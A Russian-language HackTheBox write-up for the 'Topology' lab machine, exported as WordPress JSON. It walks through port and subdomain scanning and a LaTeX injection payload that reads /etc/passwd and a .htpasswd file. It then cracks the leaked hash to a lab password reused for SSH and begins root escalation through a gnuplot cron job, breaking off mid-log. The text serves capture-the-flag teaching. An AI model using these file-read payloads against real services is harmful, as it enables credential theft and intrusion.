{"id":840,"date":"2023-11-04T18:00:00","date_gmt":"2023-11-04T15:00:00","guid":{"rendered":"https:\/\/seq.team\/?p=840"},"modified":"2025-12-02T15:16:28","modified_gmt":"2025-12-02T12:16:28","slug":"razbor-hackthebox-topology-easy","status":"publish","type":"post","link":"https:\/\/seq.team\/en\/blog\/razbor-hackthebox-topology-easy\/","title":{"rendered":"\u0420\u0430\u0437\u0431\u043e\u0440 HackTheBox &#8211; Topology (Easy)"},"content":{"rendered":"\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:66.66%\">\n<figure class=\"wp-block-table\"><table><tbody><tr><td>\u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c:<\/td><td>Easy<\/td><\/tr><tr><td>\u041e\u0421:<\/td><td>Linux<\/td><\/tr><tr><td>\u0411\u0430\u043b\u043b\u044b:<\/td><td>20<\/td><\/tr><tr><td>IP:<\/td><td>10.10.11.217<\/td><\/tr><tr><td>\u0422\u0435\u0433\u0438:<\/td><td>LaTeX syntax, Password Bruteforce, Command Injection, Linux PrivEsc<\/td><\/tr><\/tbody><\/table><\/figure>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:33.33%\"><\/div>\n<\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f<\/h3>\n\n\n\n<p>\u041f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0439 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d \u0441 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u0447\u0442\u0435\u043d\u0438\u044f \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0442\u043e\u0440\u0430 <code>LaTeX<\/code>.<br>\u0418\u0437 \u0444\u0430\u0439\u043b\u0430 <code>\/var\/www\/dev\/.htpasswd<\/code> \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c <code>Apache MD5 \u0445\u044d\u0448<\/code> \u043f\u0430\u0440\u043e\u043b\u044f \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 <code><strong>vdaisley<\/strong><\/code> \u0438 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u0435\u0440\u0435\u0431\u0438\u0440\u0430\u0435\u043c \u0435\u0433\u043e, \u043f\u043e\u0441\u043b\u0435 \u0447\u0435\u0433\u043e \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0444\u043b\u0430\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u0417\u0430\u0442\u0435\u043c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u044b <code>pspy64<\/code> \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0432 \u0444\u0430\u0439\u043b <code>.plt<\/code> \u0438 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 <code><strong>root<\/strong><\/code> \u0438 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0439 \u0444\u043b\u0430\u0433.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u0424\u0430\u0437\u0430 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438<\/h3>\n\n\n\n<p>\u041f\u0440\u043e\u0432\u0435\u0434\u0451\u043c \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0435 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0446\u0435\u043b\u0438: <\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><code>nmap -sS -p- 10.10.11.217<\/code><\/p>\n<\/blockquote>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nPORT      STATE SERVICE\n22\/tcp    open  ssh\n80\/tcp    open  http\n<\/pre><\/div>\n\n\n<p>\u041f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e: <code>nmap -sVC -O -p22,80 10.10.11.217<\/code><\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n|   3072 dc:bc:32:86:e8:e8:45:78:10:bc:2b:5d:bf:0f:55:c6 (RSA)\n|   256 d9:f3:39:69:2c:6c:27:f1:a9:2d:50:6c:a7:9f:1c:33 (ECDSA)\n|_  256 4c:a6:50:75:d0:93:4f:9c:4a:1b:89:0a:7a:27:08:d7 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.41\n|_http-title: Miskatonic University | Topology Group\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n<\/pre><\/div>\n\n\n<p>\u041f\u0440\u0438 \u043f\u043e\u0441\u0435\u0449\u0435\u043d\u0438\u0438 \u0441\u0430\u0439\u0442\u0430 \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0438\u0441\u0430 \u0443\u043d\u0438\u0432\u0435\u0440\u0441\u0438\u0442\u0435\u0442\u0430 <code>Miskatonic University of Mathematics, Topology Group<\/code> \u0441 \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u043c\u0438 \u043d\u0430 \u043d\u0451\u043c \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0430\u043c\u0438 \u0438 \u043f\u0440\u043e\u0435\u043a\u0442\u0430\u043c\u0438. \u0421\u0440\u0435\u0434\u0438 \u043d\u0438\u0445 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0435\u043d \u043f\u0440\u043e\u0435\u043a\u0442 <code>LaTeX Equation Generator<\/code>, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u043f\u0438\u0441\u043e\u043a \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432: <code>Professor Lilian Klein, Vajramani Daisley, Derek Abrahams<\/code>. \u0422\u0430\u043a\u0436\u0435, \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 \u0431\u044b\u043b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d \u0430\u0434\u0440\u0435\u0441 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0441 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u043c \u0434\u043e\u043c\u0435\u043d\u043e\u043c \u0441\u0430\u0439\u0442\u0430 &#8211; <code>lkllein@topology.htb<\/code>.<\/p>\n\n\n\n<p>\u0414\u043e\u0431\u0430\u0432\u0438\u043c \u0434\u043e\u043c\u0435\u043d\u044b \u0432 <code>\/etc\/hosts<\/code>:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n# HTB\n10.10.11.217    topology.htb   latex.topology.htb\n<\/pre><\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-30.png\" alt=\"\" class=\"wp-image-842\" width=\"700\" \/><\/figure><\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-31.png\" alt=\"\" class=\"wp-image-843\" width=\"700\" \/><\/figure><\/div>\n\n\n<p>\u041f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u043d\u0430 topology.htb:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\ngobuster dir -u http:\/\/topology.htb -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -k\n<\/pre><\/div>\n\n\n<p>\u041f\u043e\u043b\u0443\u0447\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n\/images               (Status: 200) &#x5B;Size: 1133]\n\/css                  (Status: 200) &#x5B;Size: 925]\n\/javascript           (Status: 403) &#x5B;Size: 277]\n\/portraits            (Status: 200) &#x5B;Size: 1357]\n\/server-status        (Status: 403) &#x5B;Size: 277]\n<\/pre><\/div>\n\n\n<p>\u0414\u0430\u043b\u0435\u0435 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0438\u043c \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d\u043e\u0432 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0432 \u0441\u0435\u0440\u0432\u0438\u0441\u0435 \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u0430 \u0438 \u0441\u0432\u0435\u0434\u0435\u043d\u0438\u0439, \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043c\u043e\u0436\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043b\u044e\u0431\u043e\u0439 \u0441\u043a\u0430\u043d\u0435\u0440 \u043d\u0430 \u0432\u0430\u0448\u0435 \u0443\u0441\u043c\u043e\u0442\u0440\u0435\u043d\u0438\u0435:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nffuf -w \/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt:FUZZ -u http:\/\/topology.htb\/ -H &quot;Host: FUZZ.topology.htb&quot; -fw 1612\n<\/pre><\/div>\n\n\n<p>\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\ndev              &#x5B;Status: 401, Size: 463, Words: 42, Lines: 15, Duration: 1677ms]\nstats            &#x5B;Status: 200, Size: 108, Words: 5, Lines: 6, Duration: 1215ms]\nlatex                   &#x5B;Status: 200, Size: 2828, Words: 171, Lines: 26, Duration: 3284ms]\n<\/pre><\/div>\n\n\n<p>\u0414\u043e\u0431\u0430\u0432\u0438\u043c \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d\u044b <code>dev<\/code> \u0438 <code>stats<\/code> \u0432 \u0444\u0430\u0439\u043b hosts \u0438 \u043f\u0440\u043e\u0432\u0435\u0434\u0451\u043c \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u0438\u0445 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n# HTB\n10.10.11.217    topology.htb   latex.topology.htb   dev.topology.htb   stats.topology.htb\n<\/pre><\/div>\n\n\n<p>\u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u043a \u0441\u0435\u0440\u0432\u0438\u0441\u0443 dev.topology.htb:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-32.png\" alt=\"\" class=\"wp-image-844\" width=\"700\" \/><\/figure><\/div>\n\n\n<p>\u0414\u043b\u044f \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f, \u043d\u043e \u043f\u043e\u043a\u0430 \u0447\u0442\u043e \u043d\u0438\u043a\u0430\u043a\u0438\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u043c\u044b \u043d\u0435 \u043e\u0431\u043b\u0430\u0434\u0430\u0435\u043c, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u0435\u0440\u0435\u0439\u0434\u0451\u043c \u043a \u0441\u0435\u0440\u0432\u0438\u0441\u0443 LaTeX \u0438 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0435\u0433\u043e \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u0427\u0442\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e LaTeX \u0438 \u043f\u0435\u0440\u0435\u0431\u043e\u0440 \u043f\u0430\u0440\u043e\u043b\u044f<\/h3>\n\n\n\n<p>\u0414\u0430\u043d\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0438\u0441 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u044d\u043a\u0441\u043f\u043e\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0439 \u043a\u043e\u0434 \u043d\u0430 \u044f\u0437\u044b\u043a\u0435 \u0440\u0430\u0437\u043c\u0435\u0442\u043a\u0438 LaTeX \u0432 \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0444\u043e\u0440\u043c\u0430\u0442\u0430 PNG.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-33.png\" alt=\"\" class=\"wp-image-845\" width=\"700\" \/><\/figure><\/div>\n\n\n<p>\u041f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0438\u043c \u0437\u0430\u043f\u0440\u043e\u0441, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0439 LaTeX \u0441\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441 (\u0434\u043b\u044f \u043f\u0440\u0438\u043c\u0435\u0440\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043c \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0432\u044b\u0432\u043e\u0434\u0430 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 <code>text.txt<\/code>) \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Burp Suite:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-34.png\" alt=\"\" class=\"wp-image-846\" width=\"700\" \/><\/figure><\/div>\n\n\n<p>\u0412\u0438\u0434\u0438\u043c, \u0447\u0442\u043e \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b. \u0422\u0435\u043f\u0435\u0440\u044c \u043f\u043e\u043f\u044b\u0442\u0430\u0435\u043c\u0441\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0438 \u0441\u0435\u0440\u0432\u0438\u0441\u043d\u044b\u0445 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b: <\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><code>$\\lstinputlisting{\/etc\/passwd}$<\/code><\/p>\n<\/blockquote>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-35.png\" alt=\"\" class=\"wp-image-847\" width=\"700\" \/><\/figure><\/div>\n\n\n<p>\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0441\u043f\u0438\u0441\u043e\u043a \u0441\u0435\u0440\u0432\u0438\u0441\u043d\u044b\u0445 \u0423\u0417, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0443\u0437\u043d\u0430\u043b\u0438 \u043e \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u0438\u0438 \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f <code>vdaisley<\/code>. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0440\u0430\u043d\u0435\u0435 \u043c\u044b \u0432\u0441\u0442\u0440\u0435\u0442\u0438\u043b\u0438 Basic HTTP \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044e \u043d\u0430 \u0441\u0435\u0440\u0432\u0438\u0441\u0435 <code>dev.topology.htb<\/code> \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0435 \u0434\u043b\u044f \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0438 \u043c\u043e\u0433\u0443\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442\u044c\u0441\u044f \u0432 \u0444\u0430\u0439\u043b\u0435 <code>.htpasswd<\/code>, \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043d\u043e\u043c \u043f\u043e \u043f\u0443\u0442\u0438 <code>\/var\/www\/dev\/.htpasswd<\/code>. \u0410\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e \u0432\u044b\u0432\u043e\u0434\u0443 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \/etc\/passwd \u043f\u0440\u043e\u0447\u0442\u0451\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0444\u0430\u0439\u043b\u0430 <code>\/var\/www\/dev\/.htpasswd<\/code>: <\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><code>$\\lstinputlisting{\/var\/www\/dev\/.htpasswd}$<\/code><\/p>\n<\/blockquote>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-36.png\" alt=\"\" class=\"wp-image-848\" width=\"700\" \/><\/figure><\/div>\n\n\n<p>\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0445\u044d\u0448 \u043f\u0430\u0440\u043e\u043b\u044f \u043e\u0442 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 <code>vdaisley:$apr1$1ONUB\/S2$58eeNVirnRDB5zAIBIxTY0<\/code>. \u041f\u043e\u0441\u043b\u0435 \u043d\u0435\u0434\u043e\u043b\u0433\u0438\u0445 \u043f\u043e\u0438\u0441\u043a\u043e\u0432 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043c, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u0430\u044f \u0440\u0430\u0437\u043d\u043e\u0432\u0438\u0434\u043d\u043e\u0441\u0442\u044c \u0445\u044d\u0448\u0430 \u044d\u0442\u043e <code>Apache MD5<\/code>. \u0412\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0443\u0442\u0438\u043b\u0438\u0442\u043e\u0439 <code>JohnTheRipper<\/code> \u0438 \u043f\u0435\u0440\u0435\u0431\u0435\u0440\u0451\u043c \u043f\u0430\u0440\u043e\u043b\u044c \u043f\u043e \u0441\u043b\u043e\u0432\u0430\u0440\u044e <code>rockyou<\/code>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-37.png\" alt=\"\" class=\"wp-image-849\" width=\"700\" \/><\/figure><\/div>\n\n\n<p>\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0423\u0417: <code>vdaisley:calculus20<\/code><\/p>\n\n\n\n<p>\u0423\u0441\u043f\u0435\u0448\u043d\u043e \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0443\u0435\u043c\u0441\u044f \u0441 \u044d\u0442\u0438\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u043d\u0430 <code>dev.topology.htb<\/code>:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-38.png\" alt=\"\" class=\"wp-image-850\" width=\"700\" \/><\/figure><\/div>\n\n\n<p>\u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u044d\u0442\u043e\u0442 \u043f\u0430\u0440\u043e\u043b\u044c \u0438 \u043b\u043e\u0433\u0438\u043d \u0434\u043b\u044f \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e SSH: <code>ssh vdaisley@topology.htb<\/code><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-39.png\" alt=\"\" class=\"wp-image-851\" width=\"700\" \/><\/figure><\/div>\n\n\n<p>\u0423\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0444\u043b\u0430\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u0434\u043e root<\/h3>\n\n\n\n<p>\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c <code>sudo<\/code>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-40.png\" alt=\"\" class=\"wp-image-852\" width=\"700\" \/><\/figure><\/div>\n\n\n<p>\u0417\u0430\u0433\u0440\u0443\u0437\u0438\u043c \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443 \u0441\u043a\u0440\u0438\u043f\u0442 \u0441\u0431\u043e\u0440\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 <code>LinPEAS<\/code> \u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 <code>pspy64<\/code>.<\/p>\n\n\n\n<p>\u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0435\u043d \u0432 \u043f\u043b\u0430\u043d\u0435 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u0441\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e pspy64:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n2023\/06\/23 21:34:07 CMD: UID=0   PID=3570    |    find \/opt\/gnuplot -name *.plt -exec gnuplot {};\n2023\/06\/23 21:34:07 CMD: UID=0   PID=3569    |    \/bin\/sh \/opt\/gnuplot\/getdata.sh\n2023\/06\/23 21:34:07 CMD: UID=0   PID=3568    |    \/bin\/sh -c \/opt\/gnuplot\/getdata.sh\n2023\/06\/23 21:34:07 CMD: UID=0   PID=3567    |    \/bin\/sh -c find &quot;\/opt\/gnuplot&quot; -name &quot;*.plt&quot; -exec gnuplot {} \\;\n2023\/06\/23 21:34:07 CMD: UID=0   PID=3566    |    